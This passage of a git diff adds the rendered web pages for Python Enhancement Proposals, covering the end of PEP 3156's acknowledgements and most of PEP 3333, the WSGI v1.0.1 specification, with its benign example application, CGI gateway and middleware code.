I am grateful for the numerous discussions on python-ideas from +September through December 2012, and many more on python-tulip since +then; a Skype session with Steve Dower and Dino Viehland; email +exchanges with and a visit by Ben Darnell; an audience with Niels +Provos (original author of libevent); and in-person meetings (as well +as frequent email exchanges) with several Twisted developers, +including Glyph, Brian Warner, David Reid, and Duncan McGreggor.

+

Contributors to the implementation include +Eli Bendersky, +Gustavo Carneiro (Gambit Research), +Saúl Ibarra Corretgé, +Geert Jansen, +A. Jesse Jiryu Davis, +Nikolay Kim, +Charles-François Natali, +Richard Oudkerk, +Antoine Pitrou, +Giampaolo Rodolá, +Andrew Svetlov, +and many others who submitted bugs and/or fixes.

+

I thank Antoine Pitrou for his feedback in his role of official PEP +BDFL.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3156.rst

+

Last modified: 2024-03-21 03:48:43 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3333/index.html b/pep-3333/index.html new file mode 100644 index 00000000000..496c21226ea --- /dev/null +++ b/pep-3333/index.html @@ -0,0 +1,1805 @@ + + + + + + + + PEP 3333 – Python Web Server Gateway Interface v1.0.1 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3333 – Python Web Server Gateway Interface v1.0.1

+
+
Author:
+
Phillip J. Eby <pje at telecommunity.com>
+
Discussions-To:
+
Web-SIG list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
26-Sep-2010
+
Post-History:
+
26-Sep-2010, 04-Oct-2010
+
Replaces:
+
333
+
+
+
+
Table of Contents +
+
+

Preface for Readers of PEP 333

+

This is an updated version of PEP 333, modified slightly to improve +usability under Python 3, and to incorporate several long-standing +de facto amendments to the WSGI protocol. (Its code samples have +also been ported to Python 3.)

+

While for procedural reasons [6], this must be a distinct PEP, no +changes were made that invalidate previously-compliant servers or +applications under Python 2.x. If your 2.x application or server +is compliant to PEP 333, it is also compliant with this PEP.

+

Under Python 3, however, your app or server must also follow the +rules outlined in the sections below titled, A Note On String +Types, and Unicode Issues.

+

For detailed, line-by-line diffs between this document and PEP 333, +you may view its SVN revision history [7], from revision 84854 forward.

+
+
+

Abstract

+

This document specifies a proposed standard interface between web +servers and Python web applications or frameworks, to promote web +application portability across a variety of web servers.

+
+
+

Original Rationale and Goals (from PEP 333)

+

Python currently boasts a wide variety of web application frameworks, +such as Zope, Quixote, Webware, SkunkWeb, PSO, and Twisted Web – to +name just a few [1]. This wide variety of choices can be a problem +for new Python users, because generally speaking, their choice of web +framework will limit their choice of usable web servers, and vice +versa.

+

By contrast, although Java has just as many web application frameworks +available, Java’s “servlet” API makes it possible for applications +written with any Java web application framework to run in any web +server that supports the servlet API.

+

The availability and widespread use of such an API in web servers for +Python – whether those servers are written in Python (e.g. Medusa), +embed Python (e.g. mod_python), or invoke Python via a gateway +protocol (e.g. CGI, FastCGI, etc.) – would separate choice of +framework from choice of web server, freeing users to choose a pairing +that suits them, while freeing framework and server developers to +focus on their preferred area of specialization.

+

This PEP, therefore, proposes a simple and universal interface between +web servers and web applications or frameworks: the Python Web Server +Gateway Interface (WSGI).

+

But the mere existence of a WSGI spec does nothing to address the +existing state of servers and frameworks for Python web applications. +Server and framework authors and maintainers must actually implement +WSGI for there to be any effect.

+

However, since no existing servers or frameworks support WSGI, there +is little immediate reward for an author who implements WSGI support. +Thus, WSGI must be easy to implement, so that an author’s initial +investment in the interface can be reasonably low.

+

Thus, simplicity of implementation on both the server and framework +sides of the interface is absolutely critical to the utility of the +WSGI interface, and is therefore the principal criterion for any +design decisions.

+

Note, however, that simplicity of implementation for a framework +author is not the same thing as ease of use for a web application +author. WSGI presents an absolutely “no frills” interface to the +framework author, because bells and whistles like response objects and +cookie handling would just get in the way of existing frameworks’ +handling of these issues. Again, the goal of WSGI is to facilitate +easy interconnection of existing servers and applications or +frameworks, not to create a new web framework.

+

Note also that this goal precludes WSGI from requiring anything that +is not already available in deployed versions of Python. Therefore, +new standard library modules are not proposed or required by this +specification, and nothing in WSGI requires a Python version greater +than 2.2.2. (It would be a good idea, however, for future versions +of Python to include support for this interface in web servers +provided by the standard library.)

+

In addition to ease of implementation for existing and future +frameworks and servers, it should also be easy to create request +preprocessors, response postprocessors, and other WSGI-based +“middleware” components that look like an application to their +containing server, while acting as a server for their contained +applications.

+

If middleware can be both simple and robust, and WSGI is widely +available in servers and frameworks, it allows for the possibility +of an entirely new kind of Python web application framework: one +consisting of loosely-coupled WSGI middleware components. Indeed, +existing framework authors may even choose to refactor their +frameworks’ existing services to be provided in this way, becoming +more like libraries used with WSGI, and less like monolithic +frameworks. This would then allow application developers to choose +“best-of-breed” components for specific functionality, rather than +having to commit to all the pros and cons of a single framework.

+

Of course, as of this writing, that day is doubtless quite far off. +In the meantime, it is a sufficient short-term goal for WSGI to +enable the use of any framework with any server.

+

Finally, it should be mentioned that the current version of WSGI +does not prescribe any particular mechanism for “deploying” an +application for use with a web server or server gateway. At the +present time, this is necessarily implementation-defined by the +server or gateway. After a sufficient number of servers and +frameworks have implemented WSGI to provide field experience with +varying deployment requirements, it may make sense to create +another PEP, describing a deployment standard for WSGI servers and +application frameworks.

+
+
+

Specification Overview

+

The WSGI interface has two sides: the “server” or “gateway” side, and +the “application” or “framework” side. The server side invokes a +callable object that is provided by the application side. The +specifics of how that object is provided are up to the server or +gateway. It is assumed that some servers or gateways will require an +application’s deployer to write a short script to create an instance +of the server or gateway, and supply it with the application object. +Other servers and gateways may use configuration files or other +mechanisms to specify where an application object should be +imported from, or otherwise obtained.

+

In addition to “pure” servers/gateways and applications/frameworks, +it is also possible to create “middleware” components that implement +both sides of this specification. Such components act as an +application to their containing server, and as a server to a +contained application, and can be used to provide extended APIs, +content transformation, navigation, and other useful functions.

+

Throughout this specification, we will use the term “a callable” to +mean “a function, method, class, or an instance with a __call__ +method”. It is up to the server, gateway, or application implementing +the callable to choose the appropriate implementation technique for +their needs. Conversely, a server, gateway, or application that is +invoking a callable must not have any dependency on what kind of +callable was provided to it. Callables are only to be called, not +introspected upon.

+
+

A Note On String Types

+

In general, HTTP deals with bytes, which means that this specification +is mostly about handling bytes.

+

However, the content of those bytes often has some kind of textual +interpretation, and in Python, strings are the most convenient way +to handle text.

+

But in many Python versions and implementations, strings are Unicode, +rather than bytes. This requires a careful balance between a usable +API and correct translations between bytes and text in the context of +HTTP… especially to support porting code between Python +implementations with different str types.

+

WSGI therefore defines two kinds of “string”:

+
    +
  • “Native” strings (which are always implemented using the type +named str) that are used for request/response headers and +metadata
  • +
  • “Bytestrings” (which are implemented using the bytes type +in Python 3, and str elsewhere), that are used for the bodies +of requests and responses (e.g. POST/PUT input data and HTML page +outputs).
  • +
+

Do not be confused however: even if Python’s str type is actually +Unicode “under the hood”, the content of native strings must +still be translatable to bytes via the Latin-1 encoding! (See +the section on Unicode Issues later in this document for more +details.)

+

In short: where you see the word “string” in this document, it refers +to a “native” string, i.e., an object of type str, whether it is +internally implemented as bytes or unicode. Where you see references +to “bytestring”, this should be read as “an object of type bytes +under Python 3, or type str under Python 2”.

+

And so, even though HTTP is in some sense “really just bytes”, there +are many API conveniences to be had by using whatever Python’s +default str type is.

+
+
+

The Application/Framework Side

+

The application object is simply a callable object that accepts +two arguments. The term “object” should not be misconstrued as +requiring an actual object instance: a function, method, class, +or instance with a __call__ method are all acceptable for +use as an application object. Application objects must be able +to be invoked more than once, as virtually all servers/gateways +(other than CGI) will make such repeated requests.

+

(Note: although we refer to it as an “application” object, this +should not be construed to mean that application developers will use +WSGI as a web programming API! It is assumed that application +developers will continue to use existing, high-level framework +services to develop their applications. WSGI is a tool for +framework and server developers, and is not intended to directly +support application developers.)

+

Here are two example application objects; one is a function, and the +other is a class:

+
HELLO_WORLD = b"Hello world!\n"
+
+def simple_app(environ, start_response):
+    """Simplest possible application object"""
+    status = '200 OK'
+    response_headers = [('Content-type', 'text/plain')]
+    start_response(status, response_headers)
+    return [HELLO_WORLD]
+
+class AppClass:
+    """Produce the same output, but using a class
+
+    (Note: 'AppClass' is the "application" here, so calling it
+    returns an instance of 'AppClass', which is then the iterable
+    return value of the "application callable" as required by
+    the spec.
+
+    If we wanted to use *instances* of 'AppClass' as application
+    objects instead, we would have to implement a '__call__'
+    method, which would be invoked to execute the application,
+    and we would need to create an instance for use by the
+    server or gateway.
+    """
+
+    def __init__(self, environ, start_response):
+        self.environ = environ
+        self.start = start_response
+
+    def __iter__(self):
+        status = '200 OK'
+        response_headers = [('Content-type', 'text/plain')]
+        self.start(status, response_headers)
+        yield HELLO_WORLD
+
+
+
+
+

The Server/Gateway Side

+

The server or gateway invokes the application callable once for each +request it receives from an HTTP client, that is directed at the +application. To illustrate, here is a simple CGI gateway, implemented +as a function taking an application object. Note that this simple +example has limited error handling, because by default an uncaught +exception will be dumped to sys.stderr and logged by the web +server.

+
import os, sys
+
+enc, esc = sys.getfilesystemencoding(), 'surrogateescape'
+
+def unicode_to_wsgi(u):
+    # Convert an environment variable to a WSGI "bytes-as-unicode" string
+    return u.encode(enc, esc).decode('iso-8859-1')
+
+def wsgi_to_bytes(s):
+    return s.encode('iso-8859-1')
+
+def run_with_cgi(application):
+    environ = {k: unicode_to_wsgi(v) for k,v in os.environ.items()}
+    environ['wsgi.input']        = sys.stdin.buffer
+    environ['wsgi.errors']       = sys.stderr
+    environ['wsgi.version']      = (1, 0)
+    environ['wsgi.multithread']  = False
+    environ['wsgi.multiprocess'] = True
+    environ['wsgi.run_once']     = True
+
+    if environ.get('HTTPS', 'off') in ('on', '1'):
+        environ['wsgi.url_scheme'] = 'https'
+    else:
+        environ['wsgi.url_scheme'] = 'http'
+
+    headers_set = []
+    headers_sent = []
+
+    def write(data):
+        out = sys.stdout.buffer
+
+        if not headers_set:
+             raise AssertionError("write() before start_response()")
+
+        elif not headers_sent:
+             # Before the first output, send the stored headers
+             status, response_headers = headers_sent[:] = headers_set
+             out.write(wsgi_to_bytes('Status: %s\r\n' % status))
+             for header in response_headers:
+                 out.write(wsgi_to_bytes('%s: %s\r\n' % header))
+             out.write(wsgi_to_bytes('\r\n'))
+
+        out.write(data)
+        out.flush()
+
+    def start_response(status, response_headers, exc_info=None):
+        if exc_info:
+            try:
+                if headers_sent:
+                    # Re-raise original exception if headers sent
+                    raise exc_info[1].with_traceback(exc_info[2])
+            finally:
+                exc_info = None     # avoid dangling circular ref
+        elif headers_set:
+            raise AssertionError("Headers already set!")
+
+        headers_set[:] = [status, response_headers]
+
+        # Note: error checking on the headers should happen here,
+        # *after* the headers are set.  That way, if an error
+        # occurs, start_response can only be re-called with
+        # exc_info set.
+
+        return write
+
+    result = application(environ, start_response)
+    try:
+        for data in result:
+            if data:    # don't send headers until body appears
+                write(data)
+        if not headers_sent:
+            write(b'')   # send headers now if body was empty
+    finally:
+        if hasattr(result, 'close'):
+            result.close()
+
+
+
+
+

Middleware: Components that Play Both Sides

+

Note that a single object may play the role of a server with respect +to some application(s), while also acting as an application with +respect to some server(s). Such “middleware” components can perform +such functions as:

+
    +
  • Routing a request to different application objects based on the +target URL, after rewriting the environ accordingly.
  • +
  • Allowing multiple applications or frameworks to run side by side +in the same process
  • +
  • Load balancing and remote processing, by forwarding requests and +responses over a network
  • +
  • Perform content postprocessing, such as applying XSL stylesheets
  • +
+

The presence of middleware in general is transparent to both the +“server/gateway” and the “application/framework” sides of the +interface, and should require no special support. A user who +desires to incorporate middleware into an application simply +provides the middleware component to the server, as if it were +an application, and configures the middleware component to +invoke the application, as if the middleware component were a +server. Of course, the “application” that the middleware wraps +may in fact be another middleware component wrapping another +application, and so on, creating what is referred to as a +“middleware stack”.

+

For the most part, middleware must conform to the restrictions +and requirements of both the server and application sides of +WSGI. In some cases, however, requirements for middleware +are more stringent than for a “pure” server or application, +and these points will be noted in the specification.

+

Here is a (tongue-in-cheek) example of a middleware component that +converts text/plain responses to pig Latin, using Joe Strout’s +piglatin.py. (Note: a “real” middleware component would +probably use a more robust way of checking the content type, and +should also check for a content encoding. Also, this simple +example ignores the possibility that a word might be split across +a block boundary.)

+
from piglatin import piglatin
+
+class LatinIter:
+
+    """Transform iterated output to piglatin, if it's okay to do so
+
+    Note that the "okayness" can change until the application yields
+    its first non-empty bytestring, so 'transform_ok' has to be a mutable
+    truth value.
+    """
+
+    def __init__(self, result, transform_ok):
+        if hasattr(result, 'close'):
+            self.close = result.close
+        self._next = iter(result).__next__
+        self.transform_ok = transform_ok
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        data = self._next()
+        if self.transform_ok:
+            return piglatin(data)   # call must be byte-safe on Py3
+        else:
+            return data
+
+class Latinator:
+
+    # by default, don't transform output
+    transform = False
+
+    def __init__(self, application):
+        self.application = application
+
+    def __call__(self, environ, start_response):
+
+        transform_ok = []
+
+        def start_latin(status, response_headers, exc_info=None):
+
+            # Reset ok flag, in case this is a repeat call
+            del transform_ok[:]
+
+            for name, value in response_headers:
+                if name.lower() == 'content-type' and value == 'text/plain':
+                    transform_ok.append(True)
+                    # Strip content-length if present, else it'll be wrong
+                    response_headers = [(name, value)
+                        for name, value in response_headers
+                            if name.lower() != 'content-length'
+                    ]
+                    break
+
+            write = start_response(status, response_headers, exc_info)
+
+            if transform_ok:
+                def write_latin(data):
+                    write(piglatin(data))   # call must be byte-safe on Py3
+                return write_latin
+            else:
+                return write
+
+        return LatinIter(self.application(environ, start_latin), transform_ok)
+
+
+# Run foo_app under a Latinator's control, using the example CGI gateway
+from foo_app import foo_app
+run_with_cgi(Latinator(foo_app))
+
+
+
+
+
+

Specification Details

+

The application object must accept two positional arguments. For +the sake of illustration, we have named them environ and +start_response, but they are not required to have these names. +A server or gateway must invoke the application object using +positional (not keyword) arguments. (E.g. by calling +result = application(environ, start_response) as shown above.)

+

The environ parameter is a dictionary object, containing CGI-style +environment variables. This object must be a builtin Python +dictionary (not a subclass, UserDict or other dictionary +emulation), and the application is allowed to modify the dictionary +in any way it desires. The dictionary must also include certain +WSGI-required variables (described in a later section), and may +also include server-specific extension variables, named according +to a convention that will be described below.

+

The start_response parameter is a callable accepting two +required positional arguments, and one optional argument. For the sake +of illustration, we have named these arguments status, +response_headers, and exc_info, but they are not required to +have these names, and the application must invoke the +start_response callable using positional arguments (e.g. +start_response(status, response_headers)).

+

The status parameter is a status string of the form +"999 Message here", and response_headers is a list of +(header_name, header_value) tuples describing the HTTP response +header. The optional exc_info parameter is described below in the +sections on The start_response() Callable and Error Handling. +It is used only when the application has trapped an error and is +attempting to display an error message to the browser.

+

The start_response callable must return a write(body_data) +callable that takes one positional parameter: a bytestring to be written +as part of the HTTP response body. (Note: the write() callable is +provided only to support certain existing frameworks’ imperative output +APIs; it should not be used by new applications or frameworks if it +can be avoided. See the Buffering and Streaming section for more +details.)

+

When called by the server, the application object must return an +iterable yielding zero or more bytestrings. This can be accomplished in a +variety of ways, such as by returning a list of bytestrings, or by the +application being a generator function that yields bytestrings, or +by the application being a class whose instances are iterable. +Regardless of how it is accomplished, the application object must +always return an iterable yielding zero or more bytestrings.

+

The server or gateway must transmit the yielded bytestrings to the client +in an unbuffered fashion, completing the transmission of each bytestring +before requesting another one. (In other words, applications +should perform their own buffering. See the Buffering and +Streaming section below for more on how application output must be +handled.)

+

The server or gateway should treat the yielded bytestrings as binary byte +sequences: in particular, it should ensure that line endings are +not altered. The application is responsible for ensuring that the +bytestring(s) to be written are in a format suitable for the client. (The +server or gateway may apply HTTP transfer encodings, or perform +other transformations for the purpose of implementing HTTP features +such as byte-range transmission. See Other HTTP Features, below, +for more details.)

+

If a call to len(iterable) succeeds, the server must be able +to rely on the result being accurate. That is, if the iterable +returned by the application provides a working __len__() +method, it must return an accurate result. (See +the Handling the Content-Length Header section for information +on how this would normally be used.)

+

If the iterable returned by the application has a close() method, +the server or gateway must call that method upon completion of the +current request, whether the request was completed normally, or +terminated early due to an application error during iteration or an early +disconnect of the browser. (The close() method requirement is to +support resource release by the application. This protocol is intended +to complement PEP 342’s generator support, and other common iterables +with close() methods.)

+

Applications returning a generator or other custom iterator should not +assume the entire iterator will be consumed, as it may be closed early +by the server.

+

(Note: the application must invoke the start_response() +callable before the iterable yields its first body bytestring, so that the +server can send the headers before any body content. However, this +invocation may be performed by the iterable’s first iteration, so +servers must not assume that start_response() has been called +before they begin iterating over the iterable.)

+

Finally, servers and gateways must not directly use any other +attributes of the iterable returned by the application, unless it is an +instance of a type specific to that server or gateway, such as a “file +wrapper” returned by wsgi.file_wrapper (see Optional +Platform-Specific File Handling). In the general case, only +attributes specified here, or accessed via e.g. the PEP 234 iteration +APIs are acceptable.

+
+

environ Variables

+

The environ dictionary is required to contain these CGI +environment variables, as defined by the Common Gateway Interface +specification [2]. The following variables must be present, +unless their value would be an empty string, in which case they +may be omitted, except as otherwise noted below.

+
+
REQUEST_METHOD
The HTTP request method, such as "GET" or "POST". This +cannot ever be an empty string, and so is always required.
+
SCRIPT_NAME
The initial portion of the request URL’s “path” that corresponds to +the application object, so that the application knows its virtual +“location”. This may be an empty string, if the application +corresponds to the “root” of the server.
+
PATH_INFO
The remainder of the request URL’s “path”, designating the virtual +“location” of the request’s target within the application. This +may be an empty string, if the request URL targets the +application root and does not have a trailing slash.
+
QUERY_STRING
The portion of the request URL that follows the "?", if any. +May be empty or absent.
+
CONTENT_TYPE
The contents of any Content-Type fields in the HTTP request. +May be empty or absent.
+
CONTENT_LENGTH
The contents of any Content-Length fields in the HTTP request. +May be empty or absent.
+
SERVER_NAME, SERVER_PORT
When HTTP_HOST is not set, these variables can be combined to determine a +default. See the URL Reconstruction section below for more detail. +SERVER_NAME and SERVER_PORT are required strings and must never be +empty.
+
SERVER_PROTOCOL
The version of the protocol the client used to send the request. +Typically this will be something like "HTTP/1.0" or "HTTP/1.1" +and may be used by the application to determine how to treat any +HTTP request headers. (This variable should probably be called +REQUEST_PROTOCOL, since it denotes the protocol used in the +request, and is not necessarily the protocol that will be used in the +server’s response. However, for compatibility with CGI we have to +keep the existing name.)
+
HTTP_ Variables
Variables corresponding to the client-supplied HTTP request headers +(i.e., variables whose names begin with "HTTP_"). The presence or +absence of these variables should correspond with the presence or +absence of the appropriate HTTP header in the request.
+
+

A server or gateway should attempt to provide as many other CGI +variables as are applicable. In addition, if SSL is in use, the server +or gateway should also provide as many of the Apache SSL environment +variables [5] as are applicable, such as HTTPS=on and +SSL_PROTOCOL. Note, however, that an application that uses any CGI +variables other than the ones listed above are necessarily non-portable +to web servers that do not support the relevant extensions. (For +example, web servers that do not publish files will not be able to +provide a meaningful DOCUMENT_ROOT or PATH_TRANSLATED.)

+

A WSGI-compliant server or gateway should document what variables +it provides, along with their definitions as appropriate. Applications +should check for the presence of any variables they require, and +have a fallback plan in the event such a variable is absent.

+

Note: missing variables (such as REMOTE_USER when no +authentication has occurred) should be left out of the environ +dictionary. Also note that CGI-defined variables must be native strings, +if they are present at all. It is a violation of this specification +for any CGI variable’s value to be of any type other than str.

+

In addition to the CGI-defined variables, the environ dictionary +may also contain arbitrary operating-system “environment variables”, +and must contain the following WSGI-defined variables:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
VariableValue
wsgi.versionThe tuple (1, 0), representing WSGI +version 1.0.
wsgi.url_schemeA string representing the “scheme” portion of +the URL at which the application is being +invoked. Normally, this will have the value +"http" or "https", as appropriate.
wsgi.inputAn input stream (file-like object) from which +the HTTP request body bytes can be read. (The server +or gateway may perform reads on-demand as +requested by the application, or it may +pre-read the client’s request body and buffer +it in-memory or on disk, or use any other +technique for providing such an input stream, +according to its preference.)
wsgi.errorsAn output stream (file-like object) to which +error output can be written, for the purpose of +recording program or other errors in a +standardized and possibly centralized location. +This should be a “text mode” stream; i.e., +applications should use "\n" as a line +ending, and assume that it will be converted to +the correct line ending by the server/gateway.

(On platforms where the str type is unicode, +the error stream should accept and log +arbitrary unicode without raising an error; it +is allowed, however, to substitute characters +that cannot be rendered in the stream’s encoding.)

+

For many servers, wsgi.errors will be the +server’s main error log. Alternatively, this +may be sys.stderr, or a log file of some +sort. The server’s documentation should +include an explanation of how to configure this +or where to find the recorded output. A server +or gateway may supply different error streams +to different applications, if this is desired.

+
wsgi.multithreadThis value should evaluate true if the +application object may be simultaneously +invoked by another thread in the same process, +and should evaluate false otherwise.
wsgi.multiprocessThis value should evaluate true if an +equivalent application object may be +simultaneously invoked by another process, +and should evaluate false otherwise.
wsgi.run_onceThis value should evaluate true if the server +or gateway expects (but does not guarantee!) +that the application will only be invoked this +one time during the life of its containing +process. Normally, this will only be true for +a gateway based on CGI (or something similar).
+

Finally, the environ dictionary may also contain server-defined +variables. These variables should be named using only lower-case +letters, numbers, dots, and underscores, and should be prefixed with +a name that is unique to the defining server or gateway. For +example, mod_python might define variables with names like +mod_python.some_variable.

+
+

Input and Error Streams

+

The input and error streams provided by the server must support +the following methods:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
MethodStreamNotes
read(size)input1
readline()input1, 2
readlines(hint)input1, 3
__iter__()input
flush()errors4
write(str)errors
writelines(seq)errors
+

The semantics of each method are as documented in the Python Library +Reference, except for these notes as listed in the table above:

+
    +
  1. The server is not required to read past the client’s specified +Content-Length, and should simulate an end-of-file +condition if the application attempts to read past that point. +The application should not attempt to read more data than is +specified by the CONTENT_LENGTH variable.

    A server should allow read() to be called without an argument, +and return the remainder of the client’s input stream.

    +

    A server should return empty bytestrings from any attempt to +read from an empty or exhausted input stream.

    +
  2. +
  3. Servers should support the optional “size” argument to readline(), +but as in WSGI 1.0, they are allowed to omit support for it.

    (In WSGI 1.0, the size argument was not supported, on the grounds that +it might have been complex to implement, and was not often used in +practice… but then the cgi module started using it, and so +practical servers had to start supporting it anyway!)

    +
  4. +
  5. Note that the hint argument to readlines() is optional for +both caller and implementer. The application is free not to +supply it, and the server or gateway is free to ignore it.
  6. +
  7. Since the errors stream may not be rewound, servers and gateways +are free to forward write operations immediately, without buffering. +In this case, the flush() method may be a no-op. Portable +applications, however, cannot assume that output is unbuffered +or that flush() is a no-op. They must call flush() if +they need to ensure that output has in fact been written. (For +example, to minimize intermingling of data from multiple processes +writing to the same error log.)
  8. +
+

The methods listed in the table above must be supported by all +servers conforming to this specification. Applications conforming +to this specification must not use any other methods or attributes +of the input or errors objects. In particular, applications +must not attempt to close these streams, even if they possess +close() methods.

+
+
+
+

The start_response() Callable

+

The second parameter passed to the application object is a callable +of the form start_response(status, response_headers, exc_info=None). +(As with all WSGI callables, the arguments must be supplied +positionally, not by keyword.) The start_response callable is +used to begin the HTTP response, and it must return a +write(body_data) callable (see the Buffering and Streaming +section, below).

+

The status argument is an HTTP “status” string like "200 OK" +or "404 Not Found". That is, it is a string consisting of a +Status-Code and a Reason-Phrase, in that order and separated by a +single space, with no surrounding whitespace or other characters. +(See RFC 2616, Section 6.1.1 for more information.) The string +must not contain control characters, and must not be terminated +with a carriage return, linefeed, or combination thereof.

+

The response_headers argument is a list of (header_name, +header_value) tuples. It must be a Python list; i.e. +type(response_headers) is ListType, and the server may change +its contents in any way it desires. Each header_name must be a +valid HTTP header field-name (as defined by RFC 2616, Section 4.2), +without a trailing colon or other punctuation.

+

Each header_value must not include any control characters, +including carriage returns or linefeeds, either embedded or at the end. +(These requirements are to minimize the complexity of any parsing that +must be performed by servers, gateways, and intermediate response +processors that need to inspect or modify response headers.)

+

In general, the server or gateway is responsible for ensuring that +correct headers are sent to the client: if the application omits +a header required by HTTP (or other relevant specifications that are in +effect), the server or gateway must add it. For example, the HTTP +Date: and Server: headers would normally be supplied by the +server or gateway.

+

(A reminder for server/gateway authors: HTTP header names are +case-insensitive, so be sure to take that into consideration when +examining application-supplied headers!)

+

Applications and middleware are forbidden from using HTTP/1.1 +“hop-by-hop” features or headers, any equivalent features in HTTP/1.0, +or any headers that would affect the persistence of the client’s +connection to the web server. These features are the +exclusive province of the actual web server, and a server or gateway +should consider it a fatal error for an application to attempt +sending them, and raise an error if they are supplied to +start_response(). (For more specifics on “hop-by-hop” features and +headers, please see the Other HTTP Features section below.)

+

Servers should check for errors in the headers at the time +start_response is called, so that an error can be raised while +the application is still running.

+

However, the start_response callable must not actually transmit the +response headers. Instead, it must store them for the server or +gateway to transmit only after the first iteration of the +application return value that yields a non-empty bytestring, or upon +the application’s first invocation of the write() callable. In +other words, response headers must not be sent until there is actual +body data available, or until the application’s returned iterable is +exhausted. (The only possible exception to this rule is if the +response headers explicitly include a Content-Length of zero.)

+

This delaying of response header transmission is to ensure that buffered +and asynchronous applications can replace their originally intended +output with error output, up until the last possible moment. For +example, the application may need to change the response status from +“200 OK” to “500 Internal Error”, if an error occurs while the body is +being generated within an application buffer.

+

The exc_info argument, if supplied, must be a Python +sys.exc_info() tuple. This argument should be supplied by the +application only if start_response is being called by an error +handler. If exc_info is supplied, and no HTTP headers have been +output yet, start_response should replace the currently-stored +HTTP response headers with the newly-supplied ones, thus allowing the +application to “change its mind” about the output when an error has +occurred.

+

However, if exc_info is provided, and the HTTP headers have already +been sent, start_response must raise an error, and should +re-raise using the exc_info tuple. That is:

+
raise exc_info[1].with_traceback(exc_info[2])
+
+
+

This will re-raise the exception trapped by the application, and in +principle should abort the application. (It is not safe for the +application to attempt error output to the browser once the HTTP +headers have already been sent.) The application must not trap +any exceptions raised by start_response, if it called +start_response with exc_info. Instead, it should allow +such exceptions to propagate back to the server or gateway. See +Error Handling below, for more details.

+

The application may call start_response more than once, if and +only if the exc_info argument is provided. More precisely, it is +a fatal error to call start_response without the exc_info +argument if start_response has already been called within the +current invocation of the application. This includes the case where +the first call to start_response raised an error. (See the example +CGI gateway above for an illustration of the correct logic.)

+

Note: servers, gateways, or middleware implementing start_response +should ensure that no reference is held to the exc_info +parameter beyond the duration of the function’s execution, to avoid +creating a circular reference through the traceback and frames +involved. The simplest way to do this is something like:

+
def start_response(status, response_headers, exc_info=None):
+    if exc_info:
+         try:
+             # do stuff w/exc_info here
+         finally:
+             exc_info = None    # Avoid circular ref.
+
+
+

The example CGI gateway provides another illustration of this +technique.

+
+

Handling the Content-Length Header

+

If the application supplies a Content-Length header, the server +should not transmit more bytes to the client than the header +allows, and should stop iterating over the response when enough +data has been sent, or raise an error if the application tries to +write() past that point. (Of course, if the application does +not provide enough data to meet its stated Content-Length, +the server should close the connection and log or otherwise +report the error.)

+

If the application does not supply a Content-Length header, a +server or gateway may choose one of several approaches to handling +it. The simplest of these is to close the client connection when +the response is completed.

+

Under some circumstances, however, the server or gateway may be +able to either generate a Content-Length header, or at least +avoid the need to close the client connection. If the application +does not call the write() callable, and returns an iterable +whose len() is 1, then the server can automatically determine +Content-Length by taking the length of the first bytestring yielded +by the iterable.

+

And, if the server and client both support HTTP/1.1 +“chunked encoding”, +then the server may use chunked encoding to send +a chunk for each write() call or bytestring yielded by the iterable, +thus generating a Content-Length header for each chunk. This +allows the server to keep the client connection alive, if it wishes +to do so. Note that the server must comply fully with RFC 2616 +when doing this, or else fall back to one of the other strategies for +dealing with the absence of Content-Length.

+

(Note: applications and middleware must not apply any kind of +Transfer-Encoding to their output, such as chunking or gzipping; +as “hop-by-hop” operations, these encodings are the province of the +actual web server/gateway. See Other HTTP Features below, for +more details.)

+
+
+
+

Buffering and Streaming

+

Generally speaking, applications will achieve the best throughput +by buffering their (modestly-sized) output and sending it all at +once. This is a common approach in existing frameworks such as +Zope: the output is buffered in a StringIO or similar object, then +transmitted all at once, along with the response headers.

+

The corresponding approach in WSGI is for the application to simply +return a single-element iterable (such as a list) containing the +response body as a single bytestring. This is the recommended approach +for the vast majority of application functions, that render +HTML pages whose text easily fits in memory.

+

For large files, however, or for specialized uses of HTTP streaming +(such as multipart “server push”), an application may need to provide +output in smaller blocks (e.g. to avoid loading a large file into +memory). It’s also sometimes the case that part of a response may +be time-consuming to produce, but it would be useful to send ahead the +portion of the response that precedes it.

+

In these cases, applications will usually return an iterator (often +a generator-iterator) that produces the output in a block-by-block +fashion. These blocks may be broken to coincide with multipart +boundaries (for “server push”), or just before time-consuming +tasks (such as reading another block of an on-disk file).

+

WSGI servers, gateways, and middleware must not delay the +transmission of any block; they must either fully transmit +the block to the client, or guarantee that they will continue +transmission even while the application is producing its next block. +A server/gateway or middleware may provide this guarantee in one of +three ways:

+
    +
  1. Send the entire block to the operating system (and request +that any O/S buffers be flushed) before returning control +to the application, OR
  2. +
  3. Use a different thread to ensure that the block continues +to be transmitted while the application produces the next +block.
  4. +
  5. (Middleware only) send the entire block to its parent +gateway/server
  6. +
+

By providing this guarantee, WSGI allows applications to ensure +that transmission will not become stalled at an arbitrary point +in their output data. This is critical for proper functioning +of e.g. multipart “server push” streaming, where data between +multipart boundaries should be transmitted in full to the client.

+
+

Middleware Handling of Block Boundaries

+

In order to better support asynchronous applications and servers, +middleware components must not block iteration waiting for +multiple values from an application iterable. If the middleware +needs to accumulate more data from the application before it can +produce any output, it must yield an empty bytestring.

+

To put this requirement another way, a middleware component must +yield at least one value each time its underlying application +yields a value. If the middleware cannot yield any other value, +it must yield an empty bytestring.

+

This requirement ensures that asynchronous applications and servers +can conspire to reduce the number of threads that are required +to run a given number of application instances simultaneously.

+

Note also that this requirement means that middleware must +return an iterable as soon as its underlying application returns +an iterable. It is also forbidden for middleware to use the +write() callable to transmit data that is yielded by an +underlying application. Middleware may only use their parent +server’s write() callable to transmit data that the +underlying application sent using a middleware-provided write() +callable.

+
+
+

The write() Callable

+

Some existing application framework APIs support unbuffered +output in a different manner than WSGI. Specifically, they +provide a “write” function or method of some kind to write +an unbuffered block of data, or else they provide a buffered +“write” function and a “flush” mechanism to flush the buffer.

+

